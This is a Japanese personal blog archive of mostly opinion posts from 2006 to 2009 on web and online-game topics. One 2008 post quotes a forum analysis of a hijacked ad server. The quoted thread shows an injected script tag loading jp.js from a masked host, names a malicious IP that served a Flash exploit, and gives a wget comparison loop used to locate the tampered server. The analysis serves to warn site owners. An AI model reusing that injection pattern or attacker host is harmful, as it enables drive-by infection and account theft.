Internetの最近の記事

2009年5月15日

オンラインゲームのセキュリティ

今日はいろいろと考えさせられるニュースが2つほど。

  1. ルナティア アカウントハッキングに関するお知らせ
    ちょろっとやってほとんどログインしていなかったルナティアですが、気付いたらマップに誰もいないような過疎状態になっていました。それもそのはずで、公式サイトにXSSが仕掛けられ、認証情報を抜かれたユーザが自キャラの装備等をごっそり持っていかれたようです。2chのスレッドを見ているだけなので、被害規模は正確にはわかりませんが、少なくはなさそう。
  2. 新郎のPS3本体と「ウイイレ」を勝手に売った友人に非難殺到
    こっちはオンラインのほうのデータまで消えたってことはないでしょうけど。義務教育学生のように腐るほど時間があれば別ですが、社会人なら仕事の合間から時間を一生懸命捻出してゲームをやっているんでしょうし、他人からは軽視されそうなデータであっても本人にとっては非常に重いものなのではないかなと。
データをいったいどこまで保護すればいいのか、どこまで脅威に備えるかというのは粗製乱造で長期サービスをあまり想定していない昨今のオンラインゲームサービスなら、開発や運用に掛かるコストを鑑みて、手を抜きがちになるんでしょうね。多くのアタックを受けるオンラインゲームサービスなら、サービスイン前にスキャナくらいは掛けてもいいと思うのですが、恐らくはやっていなかったのではないかと思います。 ルナティアはサービスインからまだ半年くらいだったはずですが、この事件で客足が遠のいてしまうとライセンス費がペイしないんじゃないでしょうか。手抜きで商機を逃すというリスクはウチの業界でも当然有り得ることですので、肝に銘じておきたいところです。

嫁や友人のリスクは「うまくやってくれ」としか言いようがないのですが、これ消されたら俺は死を選ぶ的なことは普段からカミングアウトしておいてもいいかもしれません。結果、婚期を逃すという別のリスクも出てきますが。
趣味ってのは往々にして他人の理解を得られ辛いものではあるのですが、今結婚適齢期を迎えている層は少なからずゲームが生き甲斐の人も存在しているわけで、それを否定して打ちのめしたところで、デートに使う時間は増えずにパチンコやらに費やすようになるんじゃないでしょうかね。

2009年4月21日

大金を使って堅牢なシステムを構築することに意義はあるのか

パズルのピースが揃ってきたところで、長年のテーマでもあった「激安でスケールアウト可能なWebサービスインフラ」をぼちぼち作り始めようかと考えています。上に載せるものは全然未完成なわけですが、1台から始められるように設計は考えています。
自費なので懐の具合もあり、1年くらい掛けてじっくり作っていく予定です。

さて、最初のピースはコレです。

P1010209.jpg

この業界でインフラ屋をやっている人が見ると「アホですか?」とツッコミを入れたくなるかと思います。が、コレは2世代前のRTX1000で、ヤフオクで誰でも8000円程度で買えてしまいます。可動部品もないですし、比較的ヘビーデューティーな環境での使用(山奥の工事現場に引っ張るISDNとか)もある程度は想定されているわけで、リース落ちした中古を拾っても壊れることなく長期にわたって使えるのではと期待しています。(あくまで個人的に期待をしているだけで、メーカーの定めた動作環境から外れた状況での使用は当然品質に一定の影響を及ぼすかと思います。)
中古でしかも1万切りなんて怖い、というのはわかります。なら多重化してしまえばいいわけで、ストックを含め数台をヤフオクで落としておき、同じコンフィグを流し込んで壊れたら切り替えればいいだけです。VRRPを組んでもいいでしょう。(未検証)

最新のRTX1200は現在8万円前後で購入ができますが、SPoF( = Single Point of Failure : 壊れるとシステム全体に支障を来たす、多重化されていない部分 )を無くすためには2台必要になり、16万円程度の出費を覚悟しなければなりません。性能に若干差はあるものの、近いものが1万6000円+予備分で済むなら、それでいいんじゃないでしょうか。

この業界に勤めてもう10年弱になりますが、壊れるものは新品中古にかかわらず、一番嫌なタイミングで壊れるものです。経験則になりますが、「ほぼ壊れない新品1台」よりも、「動作実績のある中古の冗長構成」のほうが余程信頼が置けます。データを並べても嘘っぽいので感覚に頼った書き方になってしまいますが:

・民生用機器の保証は「壊れないこと」ではなく「壊れた後の代替品」を保証している
・2台が同時に壊れるような環境(動作保証環境外)では、新品も中古も同じように壊れる
・数年間動いていた構成の片肺が潰れたとして、機器交換に掛かる1日の間にもう片方が
 同時故障する可能性はそれほど高くない

というのはなんとなく分かるかと思います。が、一番大事なのは

・100万円で冗長化したシステムと、2万円で冗長化した同性能のシステムがあったとして、
 エンドユーザからはどちらも「動いているシステム」としか評価できない

ということだったりします。個人でやるなら出費は抑えたいでしょうし、仕事だとしても機器に掛かるお金を給料として貰ったほうがハッピーでしょう。(大きな会社では難しいでしょうけど)
割り切れるなら、ユーザが気付かないのならばシステムは止まってしまってもいいわけです。更に言えば、ユーザが気付かなければ、何が起こったってシステムへの評価は変わりません。1秒でも止まることを悪だと思っている人がいっぱい居るんじゃないかと思いますが、10万ユーザのうち10名程度が一瞬の停止に気付いたところで、世間から見てどれだけ評価が下がるのでしょうか。課金されるサービスならまだしも、フリーのサービスならいきなり10分くらい止めたところで怒るのは数人でしょう。

大量にお金を積んでベンダー任せはとってもラクなのですが、許される環境なら安くて(エンドユーザから見て)止まらないシステムを、お金ではなく頭を使って作ったほうがいいと、別件で思い知らされてこの記事を書くに至ったわけです。個人と仕事でそれぞれ許されるサービス保証範囲は、遠く離れているようで実は交渉次第なんだな、と。

さて、次はL2スイッチとサーバですね。現状、自宅ではシングル構成になっていますが、自動車税やら車検やらで暫く出費が多いこともあり、いつになることやら・・・。

2009年2月15日

パブリックコメントがガン無視されている件

医薬品ネット販売規制、パブコメで97%が反対するも「省令には反映されず」

規制の内容に関しては双方に言い分がありそうなので敢えて触れないでおきます。

問題なのはコメントを集めておいて、それを完全に無視してまで法を作る(変える)ことでしょう。以前にも似たような件があって物議を醸していたのは記憶に新しいと思いますが、Yes/No で分類できる意見を募っている今回のケースならば、反対が過半数を超えたら一旦は施行を中止にして再検討をすべきでしょう。形だけでも。

圧倒的多数が反対を表明しているというのに、これだけ華麗にスルーしてしまうと、「一応意見だけは聞いてやるけど結果はもう決まってるし愚民共の戯言なんざ適当に集計してゴミ箱行きなんでよろしく。」と言っているのと大差ない訳です。よって、この決定を握る人物は、ここまで国民感情に背を向けても職を追われることがない、ということが自明の理になります。

明確な犯罪でない限りは妥協点を探るのが政治家や行政の仕事だというのに、突っぱねてしまうと却って面倒な結果になるんじゃないんでしょうかね。生活が懸かっている人たちも居ますから、もうなりふり構っていられなくなるでしょうし、暫くすると、決定権のある方の近辺で出所の怪しげなスキャンダルが噴出したりするんでしょうか。

外野として見ている分には楽しい事案なので、生暖かく見守っていきたいところです。

2008年6月12日

xreaの広告から感染する件について

仕事中なので簡潔に。
注意されたし>各位

xrea.com part131
http://pc11.2ch.net/test/read.cgi/hosting/1211121853/

504 :名無しさん@お腹いっぱい。 :sage :2008/06/08(日) 12:51:05 0
ちょっと聞いて欲しい。
無料のxreaの広告で、自動挿入じゃなくて自分で挿入する形式の奴あるよな。

<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
<noscript><iframe height="60" width="468" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" allowtransparency="true" src="http://img.xrea.com/ad_iframe.fcg?site=xxx.sxxx.xrea.com">
<a href="http://img.xrea.com/ad_click.fcg?site=xxx.sxxx.xrea.com" target="_blank">
<img src="http://img.xrea.com/ad_img.fcg?site=xxx.sxxx.xrea.com" border="0" alt="xreaad"></a></iframe></noscript>

ってやつ。
これの<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
が入ってると怪しげなIPにアクセスするんだが?
61.238.148.112 : 81
このIPは香港のIP。ぐぐると危険なIPっぽいんだが大丈夫なのか?
<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com">
を削除すると、広告はしっかり表示されるが、そのIPへのアクセスは無くなる。
自分以外のxrea借りてて<!--nobanner-->で広告位置変えてるサイトを見てみたが、
上のタグ入ってるサイトは全部そこへのアクセスがある。
<!--nobanner-->使わず自動挿入されるページはなんともないようだ。

604 :名無しさん@お腹いっぱい。 :sage :2008/06/11(水) 15:57:18 0
61.238.148.112ってhellh.netとかいう
ネトゲの垢盗むウィルス撒き散らしてる危険サイトのIPじゃない?
なんとなくググってみただけだけど

685 :666 :sage :2008/06/12(木) 10:33:11 0
解析終了!

>>666で/show.phpってファイルにアクセスしてるけど
これがFlashプレーヤーの脆弱性を突いたファイルを読み込ませようとしてる。
????.swf、???.swfやらが脆弱性を突いたファイルだと思われる。

Flashプレーヤーを最新版にしてれば問題ないとは思う。
サポ板に誰か報告しといて。


686 :666 :sage :2008/06/12(木) 10:40:04 0
ちなみにFlashプレーヤーのバージョン確認。
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

バージョンが9.0.124.0なら問題なし。
9.0.115.0以下だとヤバイかも。

694 :666 :sage :2008/06/12(木) 11:53:55 0
>>690
XREA.COMがなんかしてるんじゃなくて
「imgj.xrea.com」が乗っ取られてる。

C:\>nslookup imgj.xrea.com
Non-authoritative answer:
Name: j1.ax.xrea.com
Addresses: 202.181.97.140, 202.229.187.26, 210.153.116.18, 202.229.187.26
59.106.22.138, 202.181.97.153
Aliases: imgj.xrea.com

719 :名無しさん@お腹いっぱい。 :sage :2008/06/12(木) 15:24:52 0
for i in 202.181.97.140 202.181.97.153 202.229.187.26 210.153.116.18 59.106.22.138; do
echo $i; wget -qO- http://${i}/ad_iframe.html | md5sum; echo
done

202.181.97.140
061a0dbc17873ef1d655093b47eb5a93 -

202.181.97.153
bae3970b24cad8473cef20d8b7cd0085 -

202.229.187.26
061a0dbc17873ef1d655093b47eb5a93 -

210.153.116.18
061a0dbc17873ef1d655093b47eb5a93 -

59.106.22.138
061a0dbc17873ef1d655093b47eb5a93 -


202.181.97.153 だけ返ってくる内容が違うんですよ

723 :名無しさん@お腹いっぱい。 :sage :2008/06/12(木) 15:44:45 0
http:// 202.181.97.150 /

http:// 202.181.97.153 /

http:// 202.181.97.153 /ad_iframe.html
<SCRIPT LANGUAGE="Javascript" SRC="http://****:81/jp.js"></SCRIPT>

http:// 202.181.97.156 /


前後のIPアドレスを持つホストは同一ネットワーク上に存在するだろうと推定すると、
特定のサーバ(202.181.97.153)の特定のページ(ad_iframe.html)だけに、
外部のJavaScriptファイルを実行するようなコードが挿入されています
つまりネットワークは無関係だということです
単に一つのサーバだけの問題です
事実をろくに検証もせずに一点だけ捉えてただどこが悪いだのと述べるのは、
警告でも何でもなくてただの風評ですよ
ARPSpoofingだとか無責任に言っていた人間は切腹なさい

2008年4月25日

今webサイトは幅何pxで製作されているのか

今webサイトは幅何pxで製作されているのか

900px超えが多いですね。
企業サイトが揃って750pxあたりなのが面白い。SVGA端末で快適に見られるサイズってことですかね?

デザイナーの使っている端末とか、お客さんの端末とか、お客さんの上司の端末の画面サイズで快適に見られるサイズが多いんでしょうかねぇ。アクセス解析で解像度は取れるので、サイトユーザの平均解像度に合わせるのが一番いいんでしょうけどね。

いまだと普及価格帯のPCってほとんどXGA or WXGAなので、自宅なら横1024~1280の人が多いんでしょうね。会社に行けば17インチ液晶でしょうから、1280x1024あたり?

ざっと調べてみたけど古いデータしかなかったので、突っ込んで調べるのはやめておいた。
というわけで、取り急ぎうちも横を980くらいにしてみますか。

2007年11月27日

うちの田舎の味噌屋

ヤマカノ醸造株式会社

なんだかコンテンツがやたら充実しております。Wikiといってもサイトの性格上CMSとして利用しているだけだったり、かと思えばXOOPSをweblogのCMSに使ってみたりと、若い人がやっているのかな?と思ってみたり。スタイルシートのコピーライトを見ると仙台の畳屋だったりして、もうなにがなんだか。

一昨年に古川で宿を取ったときは公衆無線LANどころかダイヤルアップすらままならない状況だったが、最近は回線の敷設状況もマシになってるのかなぁ。古川でダメなら登米あたりは壊滅的だと思う訳だが。

たまに行きたくはなるんだが、登米町までの交通機関は仙台からの高速バス、くりこま高原駅からタクる、瀬峰or柳津からバスという感じだが、どれも本数がとっても心許無い。距離的に鉄道駅は柳津が一番近いものの、1日4本のバスに乗り遅れると追加出費が必要になるわけで、乗り換えの一つ一つがとってもスリリングである。

来年の夏あたりに、親戚に顔を見せにまた行きたいところである。

2007年8月22日

Flash Player 9が「H.264」をサポートへ

Flash Player 9が「H.264」をサポートへ[マイコミジャーナル]

H.264のどのProfile、Levelに対応するのか、とかは一次ソースを・・・見たいんだけど重くて開けないw
Highの4:4:4とかにすれば、同じファイルサイズでも画質はVP6の比じゃないわけだが、なんせエンコードに死ぬほどCPUパワーが必要だったり、HighProfile専用ハードなんて民生向けはまだまだ。High Profile に限ってはフリーウェアも簡単に変換できるような物は存在していないので、まだまだ玄人向けのフォーマットであろう。(iPod と QuickTime がいち早く H.264 対応してくれたお陰か、Baseline や Main を簡単に変換できるものは、数年前から数多く出回っている。)

解像度と画質を少し妥協すれば、AVIVO Video Converter で超高速変換ができるけど、バッチ変換はいろいろ手間が掛かる(フリーウェアとかで実現)。細かなパラメータも指定できないので、折角X1650を買ったのに、現在ではほとんど使っていなかったりw

アニメやらドラマやらをガンガンキャプチャして保存する人たちの間では、H.264エンコードに x264 と AVISynth を組み合わせて使うのが主流な模様。当然ながら、変換にはそれなりの時間を要する。

いくつか自前で圧縮を試して遊んでいるが、いくら圧縮率が高いとはいえ、ソースを損なわない程度に保存する場合は、1080pで4Mbps程度(1時間番組で1.5GB程度)は覚悟しないといけないようである。SD解像度のMPEG2-TSが同じ時間で2GBを超えてしまうので、それに比べりゃ小さくはなっているんだけれども。

Webページで直接HD解像度の映像が、しかもプラットホームにあまり依存せず見られる上、最近はライブストリームが流行りつつある(ブレイクスルーはFMSだったのかな?)訳で、そろそろ本格的にTVなんて要らないんじゃね?という気がしてきている。ただし、少なくとも当面は、DRM抜きで長尺のHD映像作品を流すような人は、あまり居ない気がしてはいる。DRMをどうするのか、その辺りの実装がFlashプレーヤにされているのか、という辺りが今回の肝じゃないかね。FMS必須って話だとガッカリだなw

とりあえず早く一次情報が見たいのでどうにかしてください>Adobeさん
あとHigh対応の安いハードウェアエンコーダがほしいです>Canopusさん or SKNetさん

続きを読む: Flash Player 9が「H.264」をサポートへ

2007年6月 2日

放置していた作業を続行

微妙に忙しくて手を付けられなかったNS/Mailサーバのリプレースに着手。
放置している間に Fedora7 が出てしまったので、ほとんど組上がってるサーバをいきなりアップデートという暴挙に出てみる。

うまく行くかはシラネ
P1010744.JPG

続きを読む: 放置していた作業を続行

2007年2月23日

ニコニコ動画がDDoS喰らい中?

「ニコニコ動画」にDDoS攻撃、サービスを一時停止

昨日は竹島の日でしたねぇ・・・。
なんという偶然。


いや、誰も関係しているとは言ってないですよ?
でも日本からではないでしょうね。刑事事件になっちゃいますから。

と、思ったら

magni:~ gsgwr$ curl --referer http://www.nicovideo.jp/ "http://chi-v138.chi.youtube.com/get_video?video_id=PumFnlu9EIY"
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>403 - Forbidden
</head>
<body>
<h1>403 - Forbidden
</body>
</html>
magni:~ gsgwr$

そういうことでしたか。

某所の判別スクリプトでは中道右派で、それほど嫌韓な訳でもないですが、どうしても経験上そっちが原因なんじゃないかと思ってしまいますな。反省。

2006年10月23日

【 見たらスグやるバトン 】

見てしまったので。

【 好きなタイプを外見で答えよう! 】

他人の外見をどうこう言えたツラしてないのでコダワリなし

【 年上が好き? 】

むしろ年下

【 財布はどんなのを使ってますか?? 】

ロフトで買った2万くらいのやつ(中身はその1/3〜半分以下)

【 携帯電話はどんなのを使ってますか?? 】

W41H
SO902i(会社の)
702NKII

【 使ってる携帯ストラップは?? 】

白井ヴィンセントのアレ

【 バッグはどんなのを使ってますか? 】

こんなの

【 バッグの主な中身は?? 】

携帯, iPod, WillcomのSIM, タバコ, 頭痛薬, 鼻炎薬, IDカード, ティッシュやらハンカチやら, その他書類

【 星に何を願う? 】

夢をください

【 もしクレヨンに生まれ変わったら、何色がいい? 】

【 好きなスポーツは? 】

冬期限定でスキー

【 好きな日 】

3日以上の連休

【 最後に観た映画は? 】

フルメタル・ジャケット(最近DVDを買った)
コレ
コレ

【 怒ってる時どうする? 】

Lv.1 愛想が悪くなります
Lv.2 露骨に表情に出ます
(中略)
Lv.9 椅子やら机やらを蹴ります
Lv.10 椅子やら机やらを投げます
(中略)
Lv.99 ガス吹いて発光します

【 夏か冬どっち? 】

質問の意図が分かりませn

【 最近泣いたのはいつ?なぜ? 】

いつだろ

【 ベッドの下に何がある? 】

布団派です

【 昨夜何した? 】

障害復旧

【 好きな車は? 】

Maserati GranSport 当然ブルーで

【 好きな花は? 】

朝顔

というわけで最近こんな感じです。

このアーカイブについて

このページには、過去に書かれた記事のうちInternetカテゴリに属しているものが含まれています。

前のカテゴリはinformationです。

次のカテゴリはMacintoshです。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。